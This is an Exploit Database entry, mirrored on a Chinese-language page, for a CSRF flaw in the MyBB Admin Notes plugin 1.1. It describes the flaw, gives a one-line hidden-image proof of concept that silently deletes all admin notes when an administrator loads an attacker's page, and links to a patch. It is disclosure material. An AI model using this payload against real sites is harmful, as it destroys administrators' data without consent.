MyBB Admin Notes Plugin 1.1 – Cross-Site Request Forgery

Exploit Database
23 阅读

作者： 0xB9

日期： 2018-05-16
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/44624/

# Exploit Title: MyBB Admin Notes Plugin - CSRF
# Date: 2018-05-14
# Author: 0xB9
# Contact: luxorforums.com/User-0xB9 or 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1106
# Version: 1.1
# Tested on: Ubuntu 18.04

# 1. Description: The plugin allows administrators to save notes and display them in a list in the ACP. The CSRF allows an attacker to remotely delete all admin notes.

# 2. Proof of Concept:
<html>
	<body>
		<img style="display:none" src="http://localhost/mybb/admin/index.php?empty=table" alt="">
	</body>
</html>

# 3. Solution:
# Update to the latest release
# Patch: https://github.com/vintagedaddyo/MyBB_Plugin-adminnotes/commit/3deae701cdd89753cb6688302aee5b93a72bc58b?diff=split

last Exploits
MyBB Admin Notes Plugin 1.1 – Cross-Site Request Forgery的更多信息

Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection：
Seeddms 5.1.10 – Remote Command Execution (RCE) (Authenticated)：
Pinterestclones – Security Bypass / HTML Injection：
Joomla! Component Minify4Joomla! – Arbitrary File Upload / Persistent Cross-Site Scripting：
Dolibarr ERP/CRM 3.1.0 – ‘/admin/boxes.php?rowid’ SQL Injection：
Joomla! Component Spider Calendar 3.2.6 – SQL Injection：
VMware vCenter Server 7.0 – Remote Code Execution (RCE) (Unauthenticated)：
K9 Kreativity Design – ‘pages.php’ SQL Injection：